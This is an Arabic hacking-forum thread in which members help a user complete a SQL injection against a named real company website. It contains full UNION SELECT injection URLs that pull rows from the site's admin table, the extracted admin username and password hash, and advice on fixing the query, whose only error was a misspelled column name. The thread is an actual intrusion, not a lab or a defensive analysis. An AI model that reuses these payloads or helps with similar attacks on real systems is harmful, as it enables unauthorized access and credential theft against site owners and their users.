:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   مشكله : بالحقنة الاخيرة (http://www.vbspiders.com/vb/t38260.html)

T-72 10-11-2010 10:12 PM

مشكله : بالحقنة الاخيرة
 
بسم الله الرحمن الرحيم

كيف الشباب


حقنت موقع مصاب
واستجاب لكل الحقنات
الا الحقنه الاخيرة لحظه ظهور الباس واليوزر

كود PHP:

 http://aksabragroup.com/ar/index.php?page=content&op=view&id=2+and+1=0+union+select+1,concat%28passwor,0x3a,username%29,3,4,5,6+from+admin 



.

aircrack -ng 10-11-2010 10:38 PM

تفضل اخي
كود:

http://aksabragroup.com/ar/index.php?page=content&op=view&id=2+and+1=0+union+select+1,concat(username,0x3a,password),3,4,5,6+from+admin

aircrack -ng 10-11-2010 10:39 PM

admin

387cb33c9d77fb00df1ead75f61ef324

Saad Ghamdi 10-12-2010 04:06 AM

ممتاز

T-72 10-12-2010 06:46 AM

مشكور اخي

ولكن ؟؟

حقنتك كانت متل حقنتي ؟؟

كيف طلع معك الباس ؟؟؟

ممكن توضح الطريقه ي غالي ؟؟
والك كل الشكر


.

aircrack -ng 10-12-2010 01:57 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة T-72 (المشاركة 235208)
مشكور اخي

ولكن ؟؟

حقنتك كانت متل حقنتي ؟؟

كيف طلع معك الباس ؟؟؟

ممكن توضح الطريقه ي غالي ؟؟
والك كل الشكر


.

اخي انت عكست انت عملت concat(password,0x3a,username(
يعني حطيت اسم الباس قبل اسم اليوزر وهيك خطا لازم دائما نحط اسم اليوزر ثم نحط اسم الباس يعني يصير هيك
concat(username,0x3a,password(
ان شاء الله اكون فدتك ولو بالقليل

المفترس 10-26-2010 12:03 AM

في الحقيقة اخواني انا رايت استفسارك واظن ان الاخ عبد الصمد لم يجبك جيدا لان لو عكست الباس مع اليوزر ليس هناك تاتير ستحصل على النتيجة لكن خطاءك الوحيد انك نسيت ان تضع حرف p في كلمة password
وارجو ان تقبل تدخلي فقصد التوضيح مع كل احترام وتقدير لكم

Dr.NaNo 10-26-2010 05:04 PM

تمام كما قالو الشباب لك واجوبتهم كافيه ووافيــه وانت وضع اسم الباسورد passwor وهو اصلا password

لهذا يجب التركيز في اسماء الجداول عند الحقن ..


وايضأ كلام اخي عبد الصمد جميل الافضل انك تضع الحقنه هكذا كما قال اخي عبد الصمد..:


اقتباس:

اخي انت عكست انت عملت concat(password,0x3a,username(
يعني حطيت اسم الباس قبل اسم اليوزر وهيك خطا لازم دائما نحط اسم اليوزر ثم نحط اسم الباس يعني يصير هيك
concat(username,0x3a,password(
ان شاء الله اكون فدتك ولو بالقليل

لكي يظهر معاك كل شي تمام ...






وبالتوفيق لك .


الساعة الآن 06:12 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0